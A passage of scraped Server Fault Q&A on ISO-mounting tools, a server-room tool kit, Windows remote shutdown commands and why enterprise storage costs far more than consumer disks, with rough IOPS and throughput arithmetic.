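For 200 seats that works out to about 37.5 kW before counting cooling, which is usually the next big line item.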
{ "source": [ "https://serverfault.com/questions/2232", "https://serverfault.com", "https://serverfault.com/users/58/" ] }
2,327
What do you find as the best ISO / disk image mounting software out there? You can give a nod to $$$ alternatives, but I'm looking for the best freeware and support for DVD-size images as well. EDIT I actually use Virtual Clone Drive regularly, and would recommend that over anything else.
I would prefer the free (for non-commercial purposes) version of Daemon Tools Lite . Some other tools (merged from the other answers):
Virtual Clone Drive
Magic ISO
Microsoft Virtual CD-ROM Control Panel
Gizmo Drive
{ "source": [ "https://serverfault.com/questions/2327", "https://serverfault.com", "https://serverfault.com/users/458/" ] }
2,382
Trips to the server room can mean extended periods away from the comforts of home, or at least your desk. Especially if it is an off-site hosting facility. What should you take with you, apart from a warm sweater for places with good air-conditioning?
Things that I always carry on my person, so would be present:
cell phone
iPod
pen/notepad
thumb drive
multitool

Things that I keep in my laptop bag so I don't have to think about it:
"carb bars" (I don't know what these are, but they last forever. My wife made me start carrying them after I had to sleep in a data center during a blizzard.)
quarters for snack/pop machines
a baggy of splenda (nothing worse than being stuck with people who only drink their coffee black)
notepad
Post-it notes
recovery disks (live CDs)
USB/serial/RS-232 cables and adapters (the 5-in-1 cable kit specifically, though I've tweaked it to have things like T1 loopbacks)
penlight
electrical tape
CO scissors (the kind that central office guys always carry around that you can cut and strip wires with)
screwdriver (the kind with 6 ends)
a small hand mirror for looking behind/around things

Things I keep in my toolbag - not guaranteed to have with me always, but I usually know if I'll need it:
a second 5-in-1 kit and some more cables
crimpers with RJ45 and RJ11 ends
labels (like, mailing labels - very sticky and handy for rapid labeling until a professional job can be done with a label maker)
screwdrivers/plyers/end cutters/small socket set - basic tools
a huge screwdriver that can either be used as a crow bar or to reach the mounting screws on devices that stick out of the rack (like mid-mounting a 40-inch server in a 2-post telco rack)
velcro wraps and wax string (never used wax string? Try it, it's awesome)
a collection of writing utensils including sharpies and wax pencils to write on racks
a collection of screw driver heads - flat, phillips, hex, torx(sp?), and some other specialty ones
spare heavy-duty power extension cords and a three-plug expander
a decent digital multimeter
duct tape

I think I have more, but that's the basics. Everything on that list addresses a specific need I've had in my career. The laptop bag is heavy but well worth the bulk in saved trouble. The tool bag I'm rather proud of, it's not big (it's one of those "big mouth" bags that opens like a doctor's black bag), maybe 18 inches long and 12 wide. I spent a great deal of time customizing the contents to maximize the value for the volume. For instance, I threw away the bulky plastic container the socket kit came in; I built a much smaller organizer for it. Same with the screw heads - I built a cloth with elastic on it that the heads slide into. It's also modular - all the screw drivers are in a large pencil case, so I can find them easily and, if I know I will only need them, I can just grab them out of my car and carry them into the DC instead of the whole tool bag.
{ "source": [ "https://serverfault.com/questions/2382", "https://serverfault.com", "https://serverfault.com/users/1427/" ] }
2,391
I need to shutdown and / or reboot remote system. Can this be done remotely without physically being next to the server?
Reboot now: shutdown /r /m \\computername /t 0 Shutdown now: shutdown /s /m \\computername /t 0 In both examples, change the 0 to a number of seconds to delay if desired. Plenty of other options you can get from: shutdown /?
{ "source": [ "https://serverfault.com/questions/2391", "https://serverfault.com", "https://serverfault.com/users/163/" ] }
2,424
When server storage gets low developers all start to moan, "I can get a 1 TB drive at Walmart for 100 bucks, what's the problem". How can the complexities of storage be explained to developers so that they will understand why a 1 TB drive from Walmart just won't work. p.s. I'm a developer and want to know too: )
Some home truths about storage, or why is enterprise storage so f-ing expensive? Consumer hard drives offer large volumes of space so that even the most discerning user of *cough* streaming media *cough* can buy enough to store a collection of several terabytes. In fact, disk capacity has been growing faster than the transistor counts on silicon for a couple of decades now. 'Enterprise' storage is a somewhat more complex issue as the data has performance and integrity requirements that dictate a somewhat more heavyweight approach. The data must have some guarantee of availability in the event of hardware failures and it may have to be shared with a large number of users, which will generate many more read/write requests than a single user. The technical solutions to this problem can be many, many times more expensive per gigabyte than consumer storage solutions. They also require physical maintenance; backups must be taken and often stored off-site so that a fire does not destroy the data. This process adds ongoing costs. Performance On your 1TB consumer or even enterprise near-line drive you have just one head. The disk rotates at 7200 RPM, or 120 revolutions per second. This means that you can get at most 120 random-access I/O operations per second in theory* and somewhat less in practice. Thus, copying a large file on a single 1TB volume is relatively slow. On a disk array with 14x 72GB disks, you have 14 heads over disks going at (say) 15,000 RPM or approximately 250 revolutions per second. This gives you a theoretical maximum of 3,500 random I/O operations per second* (again, somewhat less in practice). All other things being equal a file copy will be many, many times faster. * You could get more than one random access per revolution of the disk if the geometry of the reads allowed the drive to move the heads and read a sector that happened to be available within one revolution of the disk. If the disk accesses were widely dispersed you will probably average less than one. Where a disk array formatted in a striped (see below) layout you will get a maximum of one stripe read per revolution of the disk in most circumstances and (depending on the RAID controller) possibly less than one on average. The 7200 RPM 1TB drive will probably be reasonably quick on sequential I/O. Disk arrays formatted in a striped scheme (RAID-0, RAID-5, RAID-10 etc.) can typically read at most one stripe per revolution of the disk. With a 64K stripe we can read 64Kx250 = 16MB or so of data per second off a 15,000 RPM disk. This gives a sequential throughput of around 220MB per second on an array of 14 disks, which is not that much faster on paper than the 150MB/sec or so quoted for a modern 1TB SATA disk. For video streaming (for example), an array of 4 SATA disks in a RAID-0 with a large stripe size (some RAID controllers will support stripe sizes up to 1MB) have quite a lot of sequential throughput. This example could theoretically stream about 480MB/sec, which is comfortably enough to do real-time uncompressed HD video editing. Thus, owners of Mac Pros and similar hardware can do HD video compositing tasks that would have required a machine with a direct-attach fibre array just a few years ago. The real benefit of a disk array is on database work which is characterised by large numbers of small, scattered I/O requests. On this type of workload performance is constrained by the physical latency of bits of metal in the disk going round-and-round and back-and-forth. 
This metric is known as IOPS (I/O operations per second). The more physical disks you have - regardless of capacity - the more IOPS you can theoretically do. More IOPS means more transactions per second. Data integrity Additionally most RAID configurations give you some data redundancy - which requires more than one physical disk by definition. The combination of a storage scheme with such redundancy and a larger number of drives gives a system the ability to reliably serve a large transactional workload. The infrastructure for disk arrays (and SANs in the more extreme case) is not exactly a mass-market item. In addition it is one of the bits that really, really cannot fail. This combination of standard of build and smaller market volumes doesn't come cheap. Total storage cost including backup In practice, the largest cost for maintaining 1TB of data is likely to be backup and recovery. A tape drive and 34 sets of SDLT or ultrium tapes for a full grandfather cycle of backup and recovery will probably cost more than a 1TB disk array did. Add the costs of off-site storage and the salary of even a single tape-monkey and suddenly your 1TB of data isn't quite so cheap. The cost of the disks is often a fair way down the hierarchy of dominant storage costs. At one bank I had occasion to work for SAN storage was costed at £900/GB for a development system and £5,000/GB for a disk on a production server. Even at enterprise vendor prices the physical cost of the disks was only a tiny fraction of that. Another example that I am aware of has a (relatively) modestly configured IBM Shark SAN that cost them somewhere in excess of £1 million. Just the physical storage on this is charged out at around £9/gigabyte, or about £9,000 for space equivalent to your 1TB consumer HDD.
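The IOPS and throughput arithmetic above is easy to reproduce if you want to plug in your own disk counts and spindle speeds. A small sketch using the same illustrative figures (these are rules of thumb, not vendor specifications):

single_sata_iops = 120                     # 7200 RPM drive: ~120 revolutions/sec -> ~120 random IOPS
array_disks = 14
revs_per_sec = 15000 / 60.0                # 15k RPM disk -> 250 revolutions/sec
array_iops = array_disks * revs_per_sec    # ~3,500 random IOPS in theory
stripe_kb = 64
seq_mb_per_sec = array_disks * revs_per_sec * stripe_kb / 1024.0   # ~220 MB/s sequential

print("Single SATA disk: ~%d random IOPS" % single_sata_iops)
print("14 x 15k RPM array: ~%d random IOPS, ~%d MB/s sequential" % (array_iops, seq_mb_per_sec))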
{ "source": [ "https://serverfault.com/questions/2424", "https://serverfault.com", "https://serverfault.com/users/163/" ] }